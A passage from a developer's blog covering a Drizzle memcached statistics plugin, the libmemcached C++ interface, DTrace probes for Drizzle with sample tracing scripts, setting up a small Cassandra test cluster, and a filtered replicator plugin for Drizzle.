+----------------------------------+-------------+----------+------+------+------+--------+
| localhost                        |       11211 | 1.2.6    |  975 |  407 |  950 |     25 | 
| localhost                        |       11212 | 1.2.6    |    2 |    1 |    1 |      1 | 
+----------------------------------+-------------+----------+------+------+------+--------+
2 rows in set (0.01 sec)

drizzle>

And we can see they have been updated as expected. Now, let's look at the MEMCACHED_ANALYSIS table. I'm just going to query the first 2 columns of this table:

drizzle> select servers_analyzed, average_item_size
    -> from information_schema.memcached_analysis;
+------------------+-------------------+
| servers_analyzed | average_item_size |
+------------------+-------------------+
|                2 |                86 | 
+------------------+-------------------+
1 row in set (0 sec)

drizzle>

There will always be just one row in the output from this table. It essentially mimics the functionality of the memstat client utility in libmemcached. I'm not too sure what to do with this patch at the moment. If people are interested, I can propose it for merging into Drizzle so that it will be available as a plugin.
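To give a rough idea of the kind of aggregation involved, here is a minimal C++ sketch that folds per-server counters into a single summary row. It assumes the average item size is simply total bytes divided by total items across all servers. The struct names, the analyze() function and the pool_hit_ratio field are made up for illustration; this is not the plugin's or libmemcached's actual code.

```cpp
#include <cassert>
#include <stdint.h>
#include <string>
#include <vector>

// Per-server counters, named after fields in memcached's "stats" output.
struct ServerStats
{
  std::string host;
  unsigned int port;
  uint64_t curr_items;  // items currently stored
  uint64_t bytes;       // bytes used to store those items
  uint64_t cmd_get;     // total get requests
  uint64_t get_hits;    // get requests that found a key
};

// One summary row for the whole pool (hypothetical layout).
struct PoolAnalysis
{
  uint32_t servers_analyzed;
  uint64_t average_item_size;  // bytes per item across all servers
  double pool_hit_ratio;       // percentage of gets that were hits
};

PoolAnalysis analyze(const std::vector<ServerStats> &servers)
{
  uint64_t total_items = 0, total_bytes = 0, total_gets = 0, total_hits = 0;
  for (std::vector<ServerStats>::const_iterator it = servers.begin();
       it != servers.end(); ++it)
  {
    assert(it->get_hits <= it->cmd_get);  // hits can never exceed gets
    total_items += it->curr_items;
    total_bytes += it->bytes;
    total_gets += it->cmd_get;
    total_hits += it->get_hits;
  }

  PoolAnalysis result;
  result.servers_analyzed = static_cast<uint32_t>(servers.size());
  // Guard against division by zero on an empty or idle pool.
  result.average_item_size = total_items ? total_bytes / total_items : 0;
  result.pool_hit_ratio = total_gets
      ? 100.0 * static_cast<double>(total_hits) / static_cast<double>(total_gets)
      : 0.0;
  return result;
}
```

However many servers are passed in, the result is a single summary, which matches the one-row shape of the table.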

Using Memcached with C++

2009-09-19T00:00:00-07:00

For some plugins I am working on for Drizzle, I am using the libmemcached API. The C++ interface for libmemcached used to be quite simple and not really idiomatic C++. Since drizzle is written in C++ and it would be nice to have a more C++-like interface in libmemcached, we have updated it a little over the last few months. In this post, I'll show some simple sample usage of the libmemcached C++ interface based on this article about using memcached with Java. Please note that not all of this functionality is in the latest stable version of libmemcached, but it will likely be in the next release.

Installation

I am going to assume that memcached is already installed (see here for a good guide to installing it). To obtain libmemcached, we can either obtain the latest version of the source from launchpad, download an RPM, or download a tarball of the latest stable release and build that. I'm going to go with downloading a tarball since not everyone might have bzr installed. The latest stable release can be obtained from here.

$ cd libmemcached-0.32
$ ./configure
$ make
$ sudo make install
$ sudo ldconfig

Basic Usage

The API is very similar to the C API except more suited to C++. Some simple examples of constructing a memcached client are shown:

There are many more methods available than the 3 listed above but for most simple applications, those 3 should get you pretty far. We still need to add documentation for the C++ interface which should also be included in the next stable release of libmemcached.

MyCache Singleton

As done in the Java article, I create a wrapper around the memcached client as so:

The DeletePtrs class is simply a generic function object that deletes the pointers in an STL container. I use this to delete all the Memcache objects in the vector before it is destroyed to ensure I don't have a memory leak (have a look at Item 7 in Meyers' Effective STL for more information).
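As a minimal sketch of that cleanup pattern, assume a wrapper that owns a vector of raw client pointers. FakeClient and ClientPool are hypothetical stand-ins (so the example compiles without libmemcached), and the round-robin get() is just one simple way to hand out clients, not necessarily what MyCache does.

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <string>
#include <vector>

// Stand-in for the real client class; it only counts live instances.
struct FakeClient
{
  static int live;
  explicit FakeClient(const std::string &server) : server_(server) { ++live; }
  ~FakeClient() { --live; }
  std::string server_;
};
int FakeClient::live = 0;

// Generic function object that deletes whatever pointer it is handed.
struct DeletePtrs
{
  template <typename T>
  void operator()(const T *ptr) const
  {
    delete ptr;
  }
};

// Owns a pool of clients and hands them out round-robin.
class ClientPool
{
public:
  ClientPool(const std::string &server, std::size_t count) : next_(0)
  {
    for (std::size_t i = 0; i < count; ++i)
      clients_.push_back(new FakeClient(server));
  }

  ~ClientPool()
  {
    // Delete every pointer before the vector itself goes away.
    std::for_each(clients_.begin(), clients_.end(), DeletePtrs());
    clients_.clear();
  }

  FakeClient *get()
  {
    assert(!clients_.empty());
    FakeClient *client = clients_[next_];
    next_ = (next_ + 1) % clients_.size();
    return client;
  }

private:
  ClientPool(const ClientPool &);             // non-copyable
  ClientPool &operator=(const ClientPool &);  // non-assignable
  std::vector<FakeClient *> clients_;
  std::size_t next_;
};
```

Because operator() is a template, the same DeletePtrs object works for a container of any pointer type without naming the type at the call site.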

Sample Usage

Below, we show some samples of using the MyCache singleton. We assume that Product is some class that has been developed elsewhere that we want to cache.
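Before a Product can go into the cache it needs a byte representation. The following is a rough sketch of one way to do that, assuming the cache stores values as a std::vector<char>. The Product fields and the toBytes()/fromBytes() helpers are hypothetical and only there for illustration.

```cpp
#include <cassert>
#include <iterator>
#include <sstream>
#include <string>
#include <vector>

// Hypothetical Product; the real class would come from the application.
struct Product
{
  int id;
  std::string name;
  long price_cents;
};

// Encode as "<id>\n<price_cents>\n<name>"; the name goes last so it may
// contain any characters, including newlines.
std::vector<char> toBytes(const Product &p)
{
  std::ostringstream out;
  out << p.id << '\n' << p.price_cents << '\n' << p.name;
  assert(out.good());  // formatting to a string stream should not fail
  const std::string text = out.str();
  return std::vector<char>(text.begin(), text.end());
}

// Decode the format written by toBytes(); returns false on malformed input
// and leaves p untouched in that case.
bool fromBytes(const std::vector<char> &raw, Product &p)
{
  const std::string text(raw.begin(), raw.end());
  std::istringstream in(text);
  Product tmp;
  if (!(in >> tmp.id >> tmp.price_cents))
    return false;
  if (in.get() != '\n')
    return false;
  // Everything after the second newline is the name.
  tmp.name.assign(std::istreambuf_iterator<char>(in),
                  std::istreambuf_iterator<char>());
  p = tmp;
  return true;
}
```

A cache miss and a corrupt value can then be handled the same way: if fromBytes() returns false, load the Product from its original source and store it again.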

That's about it really. As you can see, the C++ interface has been improved in libmemcached. There is still some more work needed on the C++ interface but I think it's starting to look a lot better.

Using DTrace with Drizzle

2009-09-14T00:00:00-07:00

Over the weekend, I was reading about the DTrace support in MySQL and realized that the DTrace support in drizzle needed to be updated. Thus, I created a branch and went to work on porting the latest probes from MySQL 6.0 to drizzle. I proposed a branch for merging into trunk which contains most of the relevant static probes along with some small build fixes to ensure that the probes are correctly enabled. Hopefully, this branch will get merged in the next week or two. In this post, I'm going to give some really simple examples of using the static probes in drizzle along with pointers to various places where lots more information can be obtained on using dtrace (mostly with MySQL but it all applies to drizzle too really).

Building Drizzle with DTrace Support

First of all, the drizzle binary built on a platform with dtrace is not configured with dtrace support by default. Thus, we need to configure drizzle by passing it the --enable-dtrace option. The rest of the build and installation process is the same as normal. Note that I have not tested dtrace support on OSX and I believe it probably does not work correctly at the moment. This is something I'll aim to fix (with help from Monty) in the next few weeks.

To verify that the probes were built correctly, you should get similar output when listing the probes available in dtrace:

$ pfexec dtrace -l | grep drizzle | c++filt 
62444 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) command-done
62445 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) command-start
62446 drizzle11722          drizzled void Session::awake(Session::killed_state) connection-done
62447 drizzle11722          drizzled                 end_thread_signal connection-done
62448 drizzle11722          drizzled       void close_connections() connection-done
62449 drizzle11722          drizzled        bool Session::schedule() connection-start
62450 drizzle11722          drizzled bool mysql_delete(Session*,TableList*,Item*,st_sql_list*,unsigned long,unsigned long,bool) delete-done
62451 drizzle11722          drizzled bool drizzled::statement::Delete::execute() delete-start
62452 drizzle11722          drizzled unsigned long filesort(Session*,Table*,st_sort_field*,unsigned,SQL_SELECT*,unsigned long,bool,unsigned long*) filesort-done
62453 drizzle11722          drizzled unsigned long filesort(Session*,Table*,st_sort_field*,unsigned,SQL_SELECT*,unsigned long,bool,unsigned long*) filesort-start
62454 drizzle11722          drizzled bool mysql_insert(Session*,TableList*,List&,List&,List&,List&,enum_duplicates,bool) insert-done
62455 drizzle11722          drizzled     void select_insert::abort() insert-select-done
62456 drizzle11722          drizzled  bool select_insert::send_eof() insert-select-done
62457 drizzle11722          drizzled bool drizzled::statement::InsertSelect::execute() insert-select-start
62458 drizzle11722          drizzled bool drizzled::statement::Insert::execute() insert-start
62459 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) query-done
62460 drizzle11722          drizzled void mysql_parse(Session*,const char*,unsigned,const char**) query-exec-done
62461 drizzle11722          drizzled void mysql_parse(Session*,const char*,unsigned,const char**) query-exec-start
62462 drizzle11722          drizzled bool parse_sql(Session*,Lex_input_stream*) query-parse-done
62463 drizzle11722          drizzled bool parse_sql(Session*,Lex_input_stream*) query-parse-start
62465 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) query-start
62466 drizzle11722          drizzled bool handle_select(Session*,LEX*,select_result*,unsigned long) select-done
62467 drizzle11722          drizzled bool handle_select(Session*,LEX*,select_result*,unsigned long) select-start
62468 drizzle11722          drizzled int mysql_update(Session*,TableList*,List&,List&,Item*,unsigned,order_st*,unsigned long,enum_duplicates,bool) update-done
62469 drizzle11722          drizzled int mysql_update(Session*,TableList*,List&,List&,Item*,unsigned,order_st*,unsigned long,enum_duplicates,bool) update-start
$

Example Usage

I'm just going to show some sample scripts that I obtained from various other sources (these sources are listed later) related to DTrace with MySQL. The first simple script we will try measures query execution time (this does not include time for parsing):

#!/usr/sbin/dtrace -s

#pragma ident   "%Z%%M% %I%     %E% SMI"

#pragma D option quiet
#pragma D option switchrate=10

dtrace:::BEGIN
{
        printf(" %-16s %5s %3s %s\n", "DATABASE", "ms",
            "RET", "QUERY");
}

drizzle*:::query-exec-start
{
        /* Thread-local (self->) so the values survive until query-exec-done. */
        self->start = timestamp;
        self->query = copyinstr(arg0);
        self->db = arg2 ? copyinstr(arg2) : ".";
}

drizzle*:::query-exec-done
/self->start/
{
        this->elapsed = (timestamp - self->start) / 1000000;
        printf(" %-16.16s %5d %3d %-32.32s\n",
            self->db, this->elapsed, (int)arg0, self->query);
        self->start = 0;
        self->query = 0;
        self->db = 0;
}

The output from running that script on a toy instance of drizzle (unfortunately, I'm still a student so don't get to administer or play with any real databases) where I was running small queries is:

$ pfexec dtrace -qp `pgrep drizzled` -s ./qestat.d
 DATABASE            ms RET QUERY
                      0   0 select @@version_comment limit 1
                      0   0 show databases
                      0   0 SELECT DATABASE()
 test                 0   0 show databases
 test                 0   0 show tables
 test                 0   0 show tables
 test                 0   0 select * from t1
 test                 5   0 create table t1(a int)
 test                 0   0 insert into t1 values (5), (6),
 test                 0   0 select * from t1
 test                 0   0 select a from t1 where a = 7
^C
$
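Almost every row shows 0 in the ms column because the script divides a nanosecond interval by 1000000 using integer arithmetic, so anything shorter than a millisecond truncates to zero. A tiny sketch of the same arithmetic (the function names are made up for illustration):

```cpp
#include <cassert>
#include <stdint.h>

// Same arithmetic as the D script: nanoseconds to whole milliseconds.
uint64_t elapsedMillis(uint64_t start_ns, uint64_t end_ns)
{
  assert(end_ns >= start_ns);
  return (end_ns - start_ns) / 1000000;  // integer division truncates
}

// Dividing by 1000 instead keeps microsecond resolution.
uint64_t elapsedMicros(uint64_t start_ns, uint64_t end_ns)
{
  assert(end_ns >= start_ns);
  return (end_ns - start_ns) / 1000;
}
```

For short queries like these, reporting microseconds gives far more useful numbers than milliseconds.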

Next, let's write a simple script that uses the filesort probe:

#!/usr/sbin/dtrace -s

#pragma ident   "%Z%%M% %I%     %E% SMI"

#pragma D option quiet
#pragma D option switchrate=10

drizzle$target:::query-start
{
  self->query = copyinstr (arg0);
  self->query_start = timestamp ;
  self->filesort = 0;  /* reset so an earlier query's sort time is not reported again */
}

drizzle$target:::filesort-start
{
  self->filesort_start = timestamp;
}

drizzle$target:::filesort-done
{
  self->filesort = timestamp - self->filesort_start;
}

drizzle$target:::query-done
/ self->query != 0 /
{
  printf("%s\n", self->query);
  printf("Total: %dus Filesort: %dus\n",
            (timestamp - self->query_start) / 1000,
            self->filesort / 1000);
  self->query = 0;
}

The output from running that is (again, I have no data to play with here):

$ pfexec dtrace -qp `pgrep drizzled` -s ./filesort.d
select @@version_comment limit 1
Total: 148us Filesort: 0us
show databases
Total: 595us Filesort: 0us
SELECT DATABASE()
Total: 114us Filesort: 0us
show databases
Total: 348us Filesort: 0us
show tables
Total: 274us Filesort: 0us
show fields in 't1'
Total: 112us Filesort: 0us
show tables
Total: 402us Filesort: 0us
select * from t1
Total: 292us Filesort: 0us
select * from t1 order by a
Total: 384us Filesort: 116us
^C
$

There is lots more that can be done. Have a look at the resources below for many more examples that can be tried out on drizzle. I'm just beginning to play with DTrace in my spare time really so I'm not aware of all its capabilities and use cases. It would be cool to see something similar to the DTrace Toolkit for drizzle though (like the Drizzle DTrace Toolkit...DDT).

More Information

A lot of articles and presentations have been produced on using DTrace with MySQL. Since the current probes in drizzle are just copied from MySQL, those articles and presentations are still pretty useful to read if you want to play around with the dtrace probes in drizzle. Here are some good ones that I have come across:

DTrace Support in MySQL: Guide to Solving Real-life Performance Problems
Deep-inspecting MySQL with DTrace
Using DTrace with MySQL
Getting Started with DTracing MySQL
DTrace Database Topics (from the Solaris Internals wiki)

Future Work

This is really just the beginning of adding dtrace support to drizzle. The largest issues right now are build related and ensuring that everything works correctly on both Solaris and OSX. The static probes that I defined were all copied from MySQL with some tiny modifications in places. I'd like to know what kind of probes other people would like to see? Does anyone have any suggestions or ideas? I'd really like to hear from people who actually administer databases on what they would like to see.

From a drizzle developer's perspective, one thing I hope to see in the future is the ability for plugins to add static probes if they wish. I also need to add the probes in the handler. The only reason those are not present at the moment is due to some build related issues that I hope to resolve in the next few weeks.

Building a Small Cassandra Cluster for Testing and Development

2009-09-07T00:00:00-07:00

For college, I was playing with cassandra and thought I would document my experience in setting up a small cassandra cluster for playing around with. For this article, I actually used virtual machines (3 of them). I am assuming that we have a fresh ubuntu installation on each node. I'm also assuming static IP addresses so the /etc/hosts file on each node will have the following entries (the actual IP addresses and host names can be whatever you like):

192.168.221.138 cass01                  cass01
192.168.221.139 cass02                  cass02
192.168.221.140 cass03                  cass03

The process that I follow is to perform all the actions I outline below on one node and before actually starting the cassandra service, I clone the virtual machine as many times as I want. This makes it extremely quick for me to get up and running. I'm not going to go into detail on these issues here as there is plenty of information on these topics elsewhere (which go in to a lot more detail).

Required Packages

Cassandra requires very little to run:

Java 1.6
Ant
svn or git (only if you wish to obtain the latest code from trunk)

These packages can be installed easily:

$ sudo apt-get install sun-java6-jdk ant git-core

Create "cassandra" User and Directories

The following tasks will be performed on all nodes that we want to be in the cluster (what I do is to perform these actions on just 1 virtual machine and then clone the virtual machine multiple times). We are going to create a user account and group that cassandra will run as.

$ sudo groupadd -g 501 cassandra
$ sudo useradd -m -u 501 -g cassandra -d /home/cassandra -s /bin/bash \
> -c "Cassandra Software Owner" cassandra
$ id cassandra
uid=1001(cassandra) gid=501(cassandra) groups=501(cassandra)
$ sudo passwd cassandra

Next, we create directories for storing the software, data, commit logs, and configuration files.

$ sudo mkdir -p /opt/cassandra
$ sudo mkdir -p /opt/cassandra/source
$ sudo mkdir -p /opt/cassandra/logs
$ sudo mkdir -p /opt/cassandra/callouts
$ sudo mkdir -p /opt/cassandra/bootstrap
$ sudo mkdir -p /opt/cassandra/staging
$ sudo mkdir -p /opt/cassandra/conf
$ sudo mkdir -p /u01/cassandra/data
$ sudo mkdir -p /u02/cassandra/commitlog
$ sudo chown -R cassandra:cassandra /opt/cassandra
$ sudo chown -R cassandra:cassandra /u01/cassandra
$ sudo chown -R cassandra:cassandra /u02/cassandra
$ sudo chmod -R 755 /opt/cassandra
$ sudo chmod -R 755 /u01/cassandra
$ sudo chmod -R 755 /u02/cassandra

Above, we are assuming that /u01 and /u02 are separate disks. Of course, I do not have separate disks here, but the ideal scenario is to store the commit logs and data on separate disks. In order to make administration easier, we add the following to the cassandra user's .bashrc file (or .bash_profile):

export JAVA_HOME=/usr/lib/jvm/java-6-sun

export CASSANDRA_HOME=/opt/cassandra/source/latest
export CASSANDRA_INCLUDE=/opt/cassandra/conf/cassandra.in.sh
export CASSANDRA_CONF=/opt/cassandra/conf
export CASSANDRA_PATH=$CASSANDRA_HOME/bin

export PATH=$CASSANDRA_PATH:$PATH

Obviously, the various environment variables should be set to whatever is appropriate for your environment if you are deviating from what I am setting up here.

Download Cassandra

There are a number of options for downloading cassandra; we will use git in this article.

Running the latest code in trunk is not recommended as it is not a stable release. However, I'm going to use the latest version of the repository (cloned from the git read-only repository) for this article as I'm interested in following the development of cassandra. Thus, I'll use git to retrieve the latest code:

$ su - cassandra
$ cd /opt/cassandra/source
$ git clone git://git.apache.org/cassandra.git latest

Build and Configure Cassandra

Now, we need to build the software:

$ su - cassandra
$ cd $CASSANDRA_HOME
$ ant
Buildfile: build.xml

build-subprojects:

init:
    [mkdir] Created dir: /opt/cassandra/source/latest/build/classes
    [mkdir] Created dir: /opt/cassandra/source/latest/build/test/classes
    [mkdir] Created dir: /opt/cassandra/source/latest/src/gen-java

check-gen-cli-grammar:

gen-cli-grammar:
     [echo] Building Grammar /opt/cassandra/source/latest/src/java/org/apache/cassandra/cli/Cli.g  ....

build-project:
     [echo] apache-cassandra-incubating: /opt/cassandra/source/latest/build.xml
    [javac] Compiling 254 source files to /opt/cassandra/source/latest/build/classes
    [javac] Note: Some input files use or override a deprecated API.
    [javac] Note: Recompile with -Xlint:deprecation for details.
    [javac] Note: Some input files use unchecked or unsafe operations.
    [javac] Note: Recompile with -Xlint:unchecked for details.

build:

BUILD SUCCESSFUL
Total time: 10 seconds
$

We would like to be able to keep configuration files out of the main source tree so we copy the sample configuration files provided with the source to a particular configuration directory we maintain for cassandra:

$ cp -R $CASSANDRA_HOME/conf/* $CASSANDRA_CONF
$ cp $CASSANDRA_HOME/bin/cassandra.in.sh $CASSANDRA_INCLUDE
$ cd $CASSANDRA_CONF
$ ls -l
total 24
-rw-r--r-- 1 cassandra cassandra  1886 2009-09-05 16:05 cassandra.in.sh
-rw-r--r-- 1 cassandra cassandra  1664 2009-09-05 14:51 log4j.properties
-rw-r--r-- 1 cassandra cassandra 13926 2009-09-05 14:51 storage-conf.xml
$

The cassandra.in.sh file can be used to specify JVM options (such as the maximum heap size). Within the cassandra.in.sh file we copied over, various options can be set but we need to remove the following lines (as we have already defined CASSANDRA_CONF):

# The directory where Cassandra's configs live (required)
CASSANDRA_CONF=$cassandra_home/conf

The first configuration file which we modify is the storage-conf.xml file. The main portions which we modify are:

The storage-conf.xml configuration file is well commented and provides ample explanation on the various parameters that can be configured. It is worth reading through that file when you are wondering what can be tweaked in cassandra. Next, we need to configure the logging properties for the system. These properties are specified in the log4j.properties file (again in the $CASSANDRA_CONF directory). The portion to modify is:

# Edit the next line to point to your logs directory
log4j.appender.R.File=/opt/cassandra/logs/system.log

Starting/Stopping Cassandra

First, let's start cassandra on one node in the foreground to ensure that everything is set up correctly. Open 2 terminal windows and in one of them, start cassandra in the foreground:

$ su - cassandra
$ cassandra -f
Listening for transport dt_socket at address: 8888
DEBUG - Loading settings from /opt/cassandra/conf/storage-conf.xml
DEBUG - Syncing log with a period of 1000
DEBUG - opening keyspace Keyspace1
DEBUG - adding Super1 as 0
DEBUG - adding Standard2 as 1
DEBUG - adding Standard1 as 2
DEBUG - adding StandardByUUID1 as 3
DEBUG - adding LocationInfo as 4
DEBUG - adding HintsColumnFamily as 5
DEBUG - opening keyspace system
INFO - Saved Token not found. Using 66210133872783152550171468874444798372
DEBUG - Starting to listen on 127.0.1.1:7001
DEBUG - Binding thrift service to cass01:9160
INFO - Cassandra starting up...

Now, in the other terminal window, use the cassandra command-line interface to connect to the instance we started in our other window:

$ su - cassandra
$ cassandra-cli --host cass01 --port 9160
Connected to cass01/9160
Welcome to cassandra CLI.

Type 'help' or '?' for help. Type 'quit' or 'exit' to quit.
cassandra> help
List of all CLI commands:
?                                                      Same as help.
connect \/                              Connect to Cassandra's thrift service.
describe keyspace                        Describe keyspace.
exit                                                   Exit CLI.
help                                                   Display this help.
quit                                                   Exit CLI.
show config file                                       Display contents of config file
show cluster name                                      Display cluster name.
show keyspaces                                         Show list of keyspaces.
show version                                           Show server version.
get .['']                             Get a slice of columns.
get .['']['']                 Get a column value.
set .[''][''] = ''     Set a column.
cassandra> show version
0.4.0
cassandra> exit
$

The cassandra script provided in the bin directory can be used to start cassandra but I wanted a script that I could use to easily start/stop a cassandra instance. Here is an extremely simple script we can use to start and stop cassandra that I created:

#!/bin/bash
#
# /etc/init.d/cassandra
#
# Startup script for Cassandra
#

export JAVA_HOME=/usr/lib/jvm/java-6-sun
export CASSANDRA_HOME=/opt/cassandra/source/latest
export CASSANDRA_INCLUDE=/opt/cassandra/conf/cassandra.in.sh
export CASSANDRA_CONF=/opt/cassandra/conf
export CASSANDRA_OWNR=cassandra
export PATH=$PATH:$CASSANDRA_HOME/bin
log_file=/opt/cassandra/logs/stdout
pid_file=/opt/cassandra/logs/pid_file

if [ ! -f $CASSANDRA_HOME/bin/cassandra -o ! -d $CASSANDRA_HOME ]
then
    echo "Cassandra startup: cannot start"
    exit 1
fi

case "$1" in
    start)
        # Cassandra startup
        echo -n "Starting Cassandra: "
        su $CASSANDRA_OWNR -c "$CASSANDRA_HOME/bin/cassandra -p $pid_file" > $log_file 2>&1
        echo "OK"
        ;;
    stop)
        # Cassandra shutdown
        echo -n "Shutdown Cassandra: "
        su $CASSANDRA_OWNR -c "kill `cat $pid_file`"
        echo "OK"
        ;;
    reload|restart)
        $0 stop
        $0 start
        ;;
    status)
        ;;
    *)
        echo "Usage: `basename $0` start|stop|restart|reload"
        exit 1
esac

exit 0

The above script can be used to ensure that a cassandra service starts and stops automatically on startup/shutdown of our nodes. This might not be what you want but if it is, you would ensure the script is run at startup/shutdown by copying the script to /etc/init.d and doing the following:

$ sudo chmod a+x /etc/init.d/cassandra
$ cd /etc/init.d
$ sudo update-rc.d cassandra defaults 99
update-rc.d: warning: /etc/init.d/cassandra missing LSB information
update-rc.d: see 
 Adding system startup for /etc/init.d/cassandra ...
   /etc/rc0.d/K99cassandra -> ../init.d/cassandra
   /etc/rc1.d/K99cassandra -> ../init.d/cassandra
   /etc/rc6.d/K99cassandra -> ../init.d/cassandra
   /etc/rc2.d/S99cassandra -> ../init.d/cassandra
   /etc/rc3.d/S99cassandra -> ../init.d/cassandra
   /etc/rc4.d/S99cassandra -> ../init.d/cassandra
   /etc/rc5.d/S99cassandra -> ../init.d/cassandra
$

Adding New Nodes

Now that we have 1 node up and running, it's time to add more nodes to our cassandra cluster. This is an extremely simple process once the initial node has been set up. Assuming we have performed all the steps listed above on another node (or simply cloned a virtual machine with these steps performed as I am doing), all we need to do is modify the cassandra configuration files on the new nodes. I wish to add 2 new nodes so I will modify the appropriate portion of the storage-conf.xml configuration file to indicate this:

Now, let's start the cass02 node in the foreground to see what happens. We would expect to see some indication in the output that the new node learns about the other node that is available (in this case cass01):

$ cassandra -f
Listening for transport dt_socket at address: 8888
DEBUG - Loading settings from /opt/cassandra/conf/storage-conf.xml
DEBUG - Syncing log with a period of 1000
DEBUG - opening keyspace Keyspace1
DEBUG - adding Super1 as 0
DEBUG - adding Standard2 as 1
DEBUG - adding Standard1 as 2
DEBUG - adding StandardByUUID1 as 3
DEBUG - adding LocationInfo as 4
DEBUG - adding HintsColumnFamily as 5
DEBUG - opening keyspace system
INFO - Saved Token not found. Using 107959976695419204492109802329269912484
DEBUG - Starting to listen on 192.168.221.139:7001
DEBUG - Binding thrift service to cass02:9160
INFO - Cassandra starting up...
INFO - Node 192.168.221.138:7001 has now joined.
DEBUG - CHANGE IN STATE FOR 192.168.221.138:7001 - has token 65882889577194449649405650603559126735

Ok, now let's start the cassandra service up on cass02 properly using the script I showed earlier. Let's monitor the system log on the initial node we set up (cass01) to see what happens:

 
INFO [main] 2009-09-07 02:16:14,851 CassandraDaemon.java (line 142) Cassandra starting up...
INFO [GMFD:1] 2009-09-07 02:17:36,433 Gossiper.java (line 630) Node 192.168.221.139:7001 has now joined.
DEBUG [GMFD:1] 2009-09-07 02:17:36,435 StorageService.java (line 441)
CHANGE IN STATE FOR 192.168.221.139:7001 - has token 107959976695419204492109802329269912484

Next, let's start the cassandra service on another node (cass03) and see what happens in the system logs of the initial node (cass01). Note that the storage-conf.xml file on this new node will require the same modifications as mentioned for the cass02 node (the Seeds directive).

 
INFO [GMFD:1] 2009-09-07 02:18:44,827 Gossiper.java (line 630) Node 192.168.221.140:7001 has now joined.
DEBUG [GMFD:1] 2009-09-07 02:18:44,828 StorageService.java (line 441)
CHANGE IN STATE FOR 192.168.221.140:7001 - has token 27033316431601492526110603272792929694

Next, we will shut down the cass03 node and monitor the system logs where we will observe the following:

 
INFO [Timer-1] 2009-09-07 02:19:05,960 Gossiper.java (line 234) EndPoint 192.168.221.140:7001 is now dead.

Now, let's start cass03 back up again to see what happens:

 
INFO [GMFD:1] 2009-09-07 02:20:30,737 Gossiper.java (line 630) Node 192.168.221.140:7001 has now joined.
DEBUG [GMFD:1] 2009-09-07 02:20:30,738 StorageService.java (line 441)
CHANGE IN STATE FOR 192.168.221.140:7001 - has token 27033316431601492526110603272792929694
DEBUG [GMFD:1] 2009-09-07 02:20:30,738 StorageService.java (line 465)
Sending hinted data to 192.168.221.140:7000
DEBUG [HINTED-HANDOFF-POOL:1] 2009-09-07 02:20:30,743
HintedHandOffManager.java (line 200) Started hinted handoff for endPoint 192.168.221.140
DEBUG [HINTED-HANDOFF-POOL:1] 2009-09-07 02:20:30,760
HintedHandOffManager.java (line 235) Finished hinted handoff for endpoint 192.168.221.140

Now all 3 nodes are back in the cluster again. We can see how easy it is to add new nodes. We simply need to inform the new node of some other nodes in the cluster (not necessarily all of them due to the gossip-based membership protocol).
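To see why a new node only needs to know about one existing node, here is a toy sketch of gossip-style membership. It is a deliberate simplification and not how cassandra implements it: real gossip picks peers at random and also exchanges state such as heartbeats, whereas here every node simply merges views with every endpoint it knows about in each round. The View and Cluster types and the join(), exchange() and gossipRound() functions are made up for illustration.

```cpp
#include <cassert>
#include <map>
#include <set>
#include <string>

typedef std::set<std::string> View;           // endpoints a node knows about
typedef std::map<std::string, View> Cluster;  // node name -> its view

// A new node starts out knowing only itself and its seeds.
void join(Cluster &cluster, const std::string &node, const View &seeds)
{
  View view = seeds;
  view.insert(node);
  cluster[node] = view;
}

// One gossip exchange: both sides end up with the union of their views.
void exchange(Cluster &cluster, const std::string &a, const std::string &b)
{
  assert(cluster.count(a) && cluster.count(b));
  View merged = cluster[a];
  merged.insert(cluster[b].begin(), cluster[b].end());
  cluster[a] = merged;
  cluster[b] = merged;
}

// One round: every node gossips with every live endpoint in its view.
void gossipRound(Cluster &cluster)
{
  for (Cluster::iterator it = cluster.begin(); it != cluster.end(); ++it)
  {
    const View peers = it->second;  // copy, since exchange() mutates views
    for (View::const_iterator p = peers.begin(); p != peers.end(); ++p)
    {
      if (*p != it->first && cluster.count(*p))
        exchange(cluster, it->first, *p);
    }
  }
}
```

If cass02 and cass03 both join with only cass01 as a seed, they have never been told about each other, yet after a couple of rounds each of the three nodes knows the full membership.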

Conclusion

The main reason I wrote this post is because I wanted to document my experiences in setting up a small cassandra cluster for future reference. I'm taking a class this semester in distributed systems for fun (since I've satisfied the course requirements for my program) which involves a semester project and one project that I've been toying with in my mind is performing an experimental evaluation of various failure detectors. For example, cassandra uses the phi-accrual failure detector from Hayashibara et al.'s paper but there is a multitude of other possible failure detectors that could be used. I'm thinking of implementing and evaluating various failure detectors in real systems such as cassandra and voldemort. It is one possibility for a project that I've thought of (which I have not run by the professor yet). I've implemented a different failure detector in cassandra already this week but performing an evaluation of a failure detector is not an easy process (what metrics to use to evaluate a failure detector is itself an interesting question). However, if anyone could think of any other interesting project in distributed systems that might allow me to make a contribution to one of these open-source projects, that would be awesome! Anyway, that's all I've got for now. A really good article to read next is this one that goes into some detail on actually using cassandra.

Developing a Replicator Plugin for Drizzle

2009-07-24T00:00:00-07:00

Recently, I started working on a plugin that performs direct to Memcached replication in Drizzle. While working on this, I found that I wanted to be able to filter replication events based on schema or table names. I went ahead and implemented this in my Memcached plugin but then realized that this functionality would be better off as its own plugin as I imagine filtering of replication events will be a pretty common task people will want to perform. This led me to start working on a filtered replicator plugin for Drizzle. Before diving into the plugin implementation, I should mention that Jay Pipes has previously written in significant detail on the replication architecture in Drizzle. I recommend reading that post from Jay if you are not familiar with replication in Drizzle before proceeding with this post.

Jay is currently working on providing documentation regarding replication in Drizzle and you can track that work on the wiki page he created. It's still a work in progress so if you really want to discover how all this works in Drizzle, I recommend having a look at the source code. Jay's work contains a copious amount of comments and is not difficult to read or understand; I highly recommend it. If you are interested in getting involved with this replication development, I'm sure Jay would be more than happy to get some contributors involved. The best way to get started is to ping the mailing list or one of the developers on #drizzle on FreeNode to indicate your interest.

Development of the Replicator Plugin

As with any plugin in Drizzle, there are 3 files that are important for building the plugin:

plugin.ini
plugin.ac
plugin.am

Only the plugin.ini file is mandatory. This file is a standard ini-file that currently contains only one section - [plugin]. For the filtered replicator plugin, the plugin.ini file looked like:

[plugin]
name=filtered_replicator
title=Filtered Replicator
description=A simple filtered replicator which allows a user to filter out
            events based on a schema or table name
load_by_default=yes
sources=filtered_replicator.cc
headers=filtered_replicator.h

